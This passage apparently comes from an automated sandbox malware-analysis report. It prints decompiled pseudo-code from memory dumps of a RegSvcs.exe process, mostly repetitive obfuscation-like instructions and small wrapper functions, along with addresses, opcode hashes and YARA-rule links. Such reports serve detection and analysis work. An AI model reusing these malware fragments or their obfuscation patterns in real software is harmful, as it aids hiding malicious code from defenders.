						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						_t10 = _t10 - 0xb5c27ad0;
						asm("scasd");
						_push(0xd36365cf);
						 *0xdbeb69df =  *0xdbeb69df << 0xb5;
						asm("cmpsb");
						asm("sbb edx, 0x4e8a2625");
						_t23 = _t23 - 1;
						asm("sbb edx, [0xa181b766]");
						_t6 = _t25 &  *0x7d482e6d;
						_t25 =  *0xb228089f;
						 *0xb228089f = _t6;
					}
					asm("sbb [0x93278], eax");
					return _t10 | 0x000000a4;
				} else {
					if(__eflags != 0) {
						_push(__ebp);
						__ebp = __esp;
						__esp = __esp - 0x64; // executed
					}
					__eax = E0041B960(__edx); // executed
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}










                                                0x0041f0a7
                                                0x0041f0a7
                                                0x0041f0a7
                                                0x0041f0aa
                                                0x0041f0ab
                                                0x0041f0ac
                                                0x0041f03d
                                                0x0041f03d
                                                0x0041f043
                                                0x0041f044
                                                0x0041f051
                                                0x0041f057
                                                0x0041f05d
                                                0x0041f06e
                                                0x0041f080
                                                0x0041f086
                                                0x0041f087
                                                0x0041f08d
                                                0x0041f08e
                                                0x00000000
                                                0x00000000
                                                0x0041eb47
                                                0x0041eb49
                                                0x0041eb4b
                                                0x0041eb4d
                                                0x0041eb4f
                                                0x0041eb51
                                                0x0041eb53
                                                0x0041eb55
                                                0x0041eb57
                                                0x0041eb59
                                                0x0041eb5b
                                                0x0041eb5d
                                                0x0041eb5f
                                                0x0041eb61
                                                0x0041eb63
                                                0x0041eb65
                                                0x0041eb67
                                                0x0041eb69
                                                0x0041eb6b
                                                0x0041eb6d
                                                0x0041eb6f
                                                0x0041eb71
                                                0x0041eb73
                                                0x0041eb75
                                                0x0041eb77
                                                0x0041eb79
                                                0x0041eb7b
                                                0x0041eb7d
                                                0x0041eb7f
                                                0x0041eb81
                                                0x0041eb83
                                                0x0041eb85
                                                0x0041eb87
                                                0x0041eb89
                                                0x0041eb8b
                                                0x0041eb8d
                                                0x0041eb8f
                                                0x0041eb91
                                                0x0041eb93
                                                0x0041eb95
                                                0x0041eb97
                                                0x0041eb99
                                                0x0041eb9b
                                                0x0041eb9d
                                                0x0041eb9f
                                                0x0041eba1
                                                0x0041eba3
                                                0x0041eba5
                                                0x0041eba7
                                                0x0041eba9
                                                0x0041ebab
                                                0x0041ebad
                                                0x0041ebaf
                                                0x0041ebb1
                                                0x0041ebb3
                                                0x0041ebb5
                                                0x0041ebb7
                                                0x0041ebb9
                                                0x0041ebbb
                                                0x0041ebbd
                                                0x0041ebbf
                                                0x0041ebc1
                                                0x0041ebc3
                                                0x0041ebc5
                                                0x0041ebc7
                                                0x0041ebc9
                                                0x0041ebcb
                                                0x0041ebcd
                                                0x0041ebcf
                                                0x0041ebd1
                                                0x0041ebd3
                                                0x0041ebd5
                                                0x0041ebd7
                                                0x0041ebd9
                                                0x0041ebdb
                                                0x0041ebdd
                                                0x0041ebdf
                                                0x0041ebe1
                                                0x0041ebe3
                                                0x0041ebe5
                                                0x0041ebe7
                                                0x0041ebe9
                                                0x0041ebeb
                                                0x0041ebed
                                                0x0041ebef
                                                0x0041ebf1
                                                0x0041ebf3
                                                0x0041ebf5
                                                0x0041ebf7
                                                0x0041ebf9
                                                0x0041ebfb
                                                0x0041ebfd
                                                0x0041ebff
                                                0x0041ec01
                                                0x0041ec03
                                                0x0041ec05
                                                0x0041ec07
                                                0x0041ec09
                                                0x0041ec0b
                                                0x0041ec0d
                                                0x0041ec0f
                                                0x0041ec11
                                                0x0041ec13
                                                0x0041ec15
                                                0x0041ec17
                                                0x0041ec19
                                                0x0041ec1b
                                                0x0041ec1d
                                                0x0041ec1f
                                                0x0041ec21
                                                0x0041ec23
                                                0x0041ec25
                                                0x0041ec27
                                                0x0041ec29
                                                0x0041ec2b
                                                0x0041ec2d
                                                0x0041ec2f
                                                0x0041ec31
                                                0x0041ec33
                                                0x0041ec35
                                                0x0041ec37
                                                0x0041ec39
                                                0x0041ec3b
                                                0x0041ec3d
                                                0x0041ec3f
                                                0x0041ec41
                                                0x0041ec43
                                                0x0041ec45
                                                0x0041ec47
                                                0x0041ec49
                                                0x0041ec4b
                                                0x0041ec4d
                                                0x0041ec4f
                                                0x0041ec51
                                                0x0041ec53
                                                0x0041ec55
                                                0x0041ec57
                                                0x0041ec59
                                                0x0041ec5b
                                                0x0041ec5d
                                                0x0041ec5f
                                                0x0041ec61
                                                0x0041ec63
                                                0x0041ec65
                                                0x0041ec67
                                                0x0041ec69
                                                0x0041ec6b
                                                0x0041ec6d
                                                0x0041ec6f
                                                0x0041ec71
                                                0x0041ec73
                                                0x0041ec75
                                                0x0041ec77
                                                0x0041ec79
                                                0x0041ec7b
                                                0x0041ec7d
                                                0x0041ec7f
                                                0x0041ec81
                                                0x0041ec83
                                                0x0041ec85
                                                0x0041ec87
                                                0x0041ec89
                                                0x0041ec8b
                                                0x0041ec8d
                                                0x0041ec8f
                                                0x0041ec91
                                                0x0041ec93
                                                0x0041ec95
                                                0x0041ec97
                                                0x0041ec99
                                                0x0041ec9b
                                                0x0041ec9d
                                                0x0041ec9f
                                                0x0041eca1
                                                0x0041eca3
                                                0x0041eca5
                                                0x0041eca7
                                                0x0041eca9
                                                0x0041ecab
                                                0x0041ecad
                                                0x0041ecaf
                                                0x0041ecb1
                                                0x0041ecb3
                                                0x0041ecb5
                                                0x0041ecb7
                                                0x0041ecb9
                                                0x0041ecbb
                                                0x0041ecbd
                                                0x0041ecbf
                                                0x0041ecc1
                                                0x0041ecc3
                                                0x0041ecc5
                                                0x0041ecc7
                                                0x0041ecc9
                                                0x0041eccb
                                                0x0041eccd
                                                0x0041eccf
                                                0x0041ecd1
                                                0x0041ecd3
                                                0x0041ecd5
                                                0x0041ecd7
                                                0x0041ecd9
                                                0x0041ecdb
                                                0x0041ecdd
                                                0x0041ecdf
                                                0x0041ece1
                                                0x0041ece3
                                                0x0041ece5
                                                0x0041ece7
                                                0x0041ece9
                                                0x0041eceb
                                                0x0041eced
                                                0x0041ecef
                                                0x0041ecf1
                                                0x0041ecf3
                                                0x0041ecf5
                                                0x0041ecf7
                                                0x0041ecf9
                                                0x0041ecfb
                                                0x0041ecfd
                                                0x0041ecff
                                                0x0041ed01
                                                0x0041ed03
                                                0x0041ed05
                                                0x0041ed07
                                                0x0041ed09
                                                0x0041ed0b
                                                0x0041ed0d
                                                0x0041ed0f
                                                0x0041ed11
                                                0x0041ed13
                                                0x0041ed15
                                                0x0041ed17
                                                0x0041ed19
                                                0x0041ed1b
                                                0x0041ed1d
                                                0x0041ed1f
                                                0x0041ed21
                                                0x0041ed23
                                                0x0041ed25
                                                0x0041ed27
                                                0x0041ed29
                                                0x0041ed2b
                                                0x0041ed2d
                                                0x0041ed2f
                                                0x0041ed31
                                                0x0041ed33
                                                0x0041ed35
                                                0x0041ed37
                                                0x0041ed39
                                                0x0041ed3b
                                                0x0041ed3d
                                                0x0041ed3f
                                                0x0041ed41
                                                0x0041ed43
                                                0x0041ed45
                                                0x0041ed47
                                                0x0041ed49
                                                0x0041ed4b
                                                0x0041ed4d
                                                0x0041ed4f
                                                0x0041ed51
                                                0x0041ed53
                                                0x0041ed55
                                                0x0041ed57
                                                0x0041ed59
                                                0x0041ed5b
                                                0x0041ed5d
                                                0x0041ed5f
                                                0x0041ed61
                                                0x0041ed63
                                                0x0041ed65
                                                0x0041ed67
                                                0x0041ed69
                                                0x0041ed6b
                                                0x0041ed6d
                                                0x0041ed6f
                                                0x0041ed71
                                                0x0041ed73
                                                0x0041ed75
                                                0x0041ed77
                                                0x0041ed79
                                                0x0041ed7b
                                                0x0041ed7d
                                                0x0041ed7f
                                                0x0041ed81
                                                0x0041ed83
                                                0x0041ed85
                                                0x0041ed87
                                                0x0041ed89
                                                0x0041ed8b
                                                0x0041ed8d
                                                0x0041ed8f
                                                0x0041ed91
                                                0x0041ed93
                                                0x0041ed95
                                                0x0041ed97
                                                0x0041ed99
                                                0x0041ed9b
                                                0x0041ed9d
                                                0x0041ed9f
                                                0x0041eda1
                                                0x0041eda3
                                                0x0041eda5
                                                0x0041eda7
                                                0x0041eda9
                                                0x0041edab
                                                0x0041edad
                                                0x0041edaf
                                                0x0041edb1
                                                0x0041edb3
                                                0x0041edb5
                                                0x0041edb7
                                                0x0041edb9
                                                0x0041edbb
                                                0x0041edbd
                                                0x0041edbf
                                                0x0041edc1
                                                0x0041edc3
                                                0x0041edc5
                                                0x0041edc7
                                                0x0041edc9
                                                0x0041edcb
                                                0x0041edcd
                                                0x0041edcf
                                                0x0041edd1
                                                0x0041edd3
                                                0x0041edd5
                                                0x0041edd7
                                                0x0041edd9
                                                0x0041eddb
                                                0x0041eddd
                                                0x0041eddf
                                                0x0041ede1
                                                0x0041ede3
                                                0x0041ede5
                                                0x0041ede7
                                                0x0041ede9
                                                0x0041edeb
                                                0x0041eded
                                                0x0041edef
                                                0x0041edf1
                                                0x0041edf3
                                                0x0041edf5
                                                0x0041edf7
                                                0x0041edf9
                                                0x0041edfb
                                                0x0041edfd
                                                0x0041edff
                                                0x0041ee01
                                                0x0041ee03
                                                0x0041ee05
                                                0x0041ee07
                                                0x0041ee09
                                                0x0041ee0b
                                                0x0041ee0d
                                                0x0041ee0f
                                                0x0041ee11
                                                0x0041ee13
                                                0x0041ee15
                                                0x0041ee17
                                                0x0041ee19
                                                0x0041ee1b
                                                0x0041ee1d
                                                0x0041ee1f
                                                0x0041ee21
                                                0x0041ee23
                                                0x0041ee25
                                                0x0041ee27
                                                0x0041ee29
                                                0x0041ee2b
                                                0x0041ee2d
                                                0x0041ee2f
                                                0x0041ee31
                                                0x0041ee33
                                                0x0041ee35
                                                0x0041ee37
                                                0x0041ee39
                                                0x0041ee3b
                                                0x0041ee3d
                                                0x0041ee3f
                                                0x0041ee41
                                                0x0041ee43
                                                0x0041ee45
                                                0x0041ee47
                                                0x0041ee49
                                                0x0041ee4b
                                                0x0041ee4d
                                                0x0041ee4f
                                                0x0041ee51
                                                0x0041ee53
                                                0x0041ee55
                                                0x0041ee57
                                                0x0041ee59
                                                0x0041ee5b
                                                0x0041ee5d
                                                0x0041ee5f
                                                0x0041ee61
                                                0x0041ee63
                                                0x0041ee65
                                                0x0041ee67
                                                0x0041ee69
                                                0x0041ee6b
                                                0x0041ee6d
                                                0x0041ee6f
                                                0x0041ee71
                                                0x0041ee73
                                                0x0041ee75
                                                0x0041ee77
                                                0x0041ee79
                                                0x0041ee7b
                                                0x0041ee7d
                                                0x0041ee7f
                                                0x0041ee81
                                                0x0041ee83
                                                0x0041ee85
                                                0x0041ee87
                                                0x0041ee89
                                                0x0041ee8b
                                                0x0041ee8d
                                                0x0041ee8f
                                                0x0041ee91
                                                0x0041ee93
                                                0x0041ee95
                                                0x0041ee97
                                                0x0041ee99
                                                0x0041ee9b
                                                0x0041ee9d
                                                0x0041ee9f
                                                0x0041eea1
                                                0x0041eea3
                                                0x0041eea5
                                                0x0041eea7
                                                0x0041eea9
                                                0x0041eeab
                                                0x0041eead
                                                0x0041eeaf
                                                0x0041eeb1
                                                0x0041eeb3
                                                0x0041eeb5
                                                0x0041eeb7
                                                0x0041eeb9
                                                0x0041eebb
                                                0x0041eebd
                                                0x0041eebf
                                                0x0041eec1
                                                0x0041eec3
                                                0x0041eec5
                                                0x0041eec7
                                                0x0041eec9
                                                0x0041eecb
                                                0x0041eecd
                                                0x0041eecf
                                                0x0041eed1
                                                0x0041eed3
                                                0x0041eed5
                                                0x0041eed7
                                                0x0041eed9
                                                0x0041eedb
                                                0x0041eedd
                                                0x0041eedf
                                                0x0041eee1
                                                0x0041eee3
                                                0x0041eee5
                                                0x0041eee7
                                                0x0041eee9
                                                0x0041eeeb
                                                0x0041eeed
                                                0x0041eeef
                                                0x0041eef1
                                                0x0041eef3
                                                0x0041eef5
                                                0x0041eef7
                                                0x0041eef9
                                                0x0041eefb
                                                0x0041eefd
                                                0x0041eeff
                                                0x0041ef01
                                                0x0041ef03
                                                0x0041ef05
                                                0x0041ef07
                                                0x0041ef09
                                                0x0041ef0b
                                                0x0041ef0d
                                                0x0041ef0f
                                                0x0041ef11
                                                0x0041ef13
                                                0x0041ef15
                                                0x0041ef17
                                                0x0041ef19
                                                0x0041ef1b
                                                0x0041ef1d
                                                0x0041ef1f
                                                0x0041ef21
                                                0x0041ef23
                                                0x0041ef25
                                                0x0041ef27
                                                0x0041ef29
                                                0x0041ef2b
                                                0x0041ef2d
                                                0x0041ef2f
                                                0x0041ef31
                                                0x0041ef33
                                                0x0041ef35
                                                0x0041ef37
                                                0x0041ef39
                                                0x0041ef3b
                                                0x0041ef3d
                                                0x0041ef3f
                                                0x0041ef41
                                                0x0041ef43
                                                0x0041ef45
                                                0x0041ef47
                                                0x0041ef49
                                                0x0041ef4b
                                                0x0041ef4d
                                                0x0041ef4f
                                                0x0041ef51
                                                0x0041ef53
                                                0x0041ef55
                                                0x0041ef57
                                                0x0041ef59
                                                0x0041ef5b
                                                0x0041ef5d
                                                0x0041ef5f
                                                0x0041ef61
                                                0x0041ef63
                                                0x0041ef65
                                                0x0041ef67
                                                0x0041ef69
                                                0x0041ef6b
                                                0x0041ef6d
                                                0x0041ef6f
                                                0x0041ef71
                                                0x0041ef73
                                                0x0041ef75
                                                0x0041ef77
                                                0x0041ef79
                                                0x0041ef7b
                                                0x0041ef7d
                                                0x0041ef7f
                                                0x0041ef81
                                                0x0041ef83
                                                0x0041ef85
                                                0x0041ef87
                                                0x0041ef89
                                                0x0041ef8b
                                                0x0041ef8d
                                                0x0041ef8f
                                                0x0041ef91
                                                0x0041ef93
                                                0x0041ef95
                                                0x0041ef97
                                                0x0041ef99
                                                0x0041ef9b
                                                0x0041ef9d
                                                0x0041ef9f
                                                0x0041efa1
                                                0x0041efa3
                                                0x0041efa5
                                                0x0041efa7
                                                0x0041efa9
                                                0x0041efab
                                                0x0041efad
                                                0x0041efaf
                                                0x0041efb1
                                                0x0041efb3
                                                0x0041efb5
                                                0x0041efb7
                                                0x0041efb9
                                                0x0041efbb
                                                0x0041efbd
                                                0x0041efbf
                                                0x0041efc1
                                                0x0041efc3
                                                0x0041efc5
                                                0x0041efc7
                                                0x0041efc9
                                                0x0041efcb
                                                0x0041efcd
                                                0x0041efcf
                                                0x0041efd1
                                                0x0041efd3
                                                0x0041efd5
                                                0x0041efd7
                                                0x0041efd9
                                                0x0041efdb
                                                0x0041efdd
                                                0x0041efdf
                                                0x0041efe1
                                                0x0041efe3
                                                0x0041efe5
                                                0x0041efe7
                                                0x0041efe9
                                                0x0041efeb
                                                0x0041efed
                                                0x0041efef
                                                0x0041eff1
                                                0x0041eff3
                                                0x0041eff5
                                                0x0041eff7
                                                0x0041eff9
                                                0x0041effb
                                                0x0041effd
                                                0x0041efff
                                                0x0041f001
                                                0x0041f006
                                                0x0041f007
                                                0x0041f012
                                                0x0041f019
                                                0x0041f01a
                                                0x0041f020
                                                0x0041f033
                                                0x0041f039
                                                0x0041f039
                                                0x0041f039
                                                0x0041f039
                                                0x0041f094
                                                0x0041f0a6
                                                0x0041f0ae
                                                0x0041f0ae
                                                0x0041f0b0
                                                0x0041f0b1
                                                0x0041f0b3
                                                0x0041f0b3
                                                0x0041f0b6
                                                0x0041f0bb
                                                0x0041f0bd
                                                0x0041f0be
                                                0x0041f0be

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e22aecaa710139e336b3399ba9f3892b6a74321107115bf66e9bda167fc7db47
                                                • Instruction ID: 7fc670e4a1f91f9211b0ae38301d28401d3d61763401b5ec916bc1d842ddddaf
                                                • Opcode Fuzzy Hash: e22aecaa710139e336b3399ba9f3892b6a74321107115bf66e9bda167fc7db47
                                                • Instruction Fuzzy Hash: B2C08079C1535D064560F97D974A0D57F18D649700B4403E7DC451515B950454D741CE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041BDC0 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041BDC0(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t6;
				void* _t8;

				_t6 = L0041A660(_a4, _t8, _a4,  *((intOrPtr*)(_t5 + 8)), 0, _a8); // executed
				return _t6;
			}






                                                0x0041bdd1
                                                0x0041bdda

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fdf0d945bbb09b432b26ca9ffcb40a9086e577bd763edbad508f70059ad1015e
                                                • Instruction ID: 36792dff887fb113422c0b4722c1c2d8450891784398787d62da6def2433b845
                                                • Opcode Fuzzy Hash: fdf0d945bbb09b432b26ca9ffcb40a9086e577bd763edbad508f70059ad1015e
                                                • Instruction Fuzzy Hash: 40C012755002086BD600DA88DC46F55339C9708614F048044B90C8B242D570F9508655
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041BDBB Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E0041BDBB(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t8;
				void* _t10;

				asm("int 0x0");
				_t8 = L0041A660(_a4, _t10, _a4,  *((intOrPtr*)(_t7 + 8)), 0, _a8); // executed
				return _t8;
			}






                                                0x0041bdbb
                                                0x0041bdd1
                                                0x0041bdda

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3028ff98afde7f31acc26ff65dbd222905644885e6348dbb7015fdf47415c047
                                                • Instruction ID: 4d7589d941e01bad67cfce7bb8228f90ca7696a76487f1c97dcd36107dd723a9
                                                • Opcode Fuzzy Hash: 3028ff98afde7f31acc26ff65dbd222905644885e6348dbb7015fdf47415c047
                                                • Instruction Fuzzy Hash: D1C08C79610104AFFB04EB54E85BFB633ADD710714F084946F55C8F692D928B8A09648
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041F0B0 Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			_entry_() {
				void* _t1;
				void* _t2;

				_t1 = E0041B960(_t2); // executed
				return _t1;
			}





                                                0x0041f0b6
                                                0x0041f0be

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f7dd743360f4df68f7be573f413038e00cc2a0e7e620416d517e22141e6a65e
                                                • Instruction ID: 318487e5e0aea3dc49f7eb1cd4554a1f15d8c32a5429445fd8a7697016cc2948
                                                • Opcode Fuzzy Hash: 4f7dd743360f4df68f7be573f413038e00cc2a0e7e620416d517e22141e6a65e
                                                • Instruction Fuzzy Hash: 0FA022A0C0830C03002030FA2A83023B32CC000A08F0003EAAE8C022023C02A83200EB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 008B0101 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                • Instruction ID: 753cf74c4883d904d39d56df8f22fb4afbc46c4cc4bfbc4ddb6dd8f677180bd1
                                                • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                • Instruction Fuzzy Hash: 05F0DA722402099FCB5C8F08C490BAA77A2FB94719F24446DE50ACF791D7359941DA55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008610D0 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
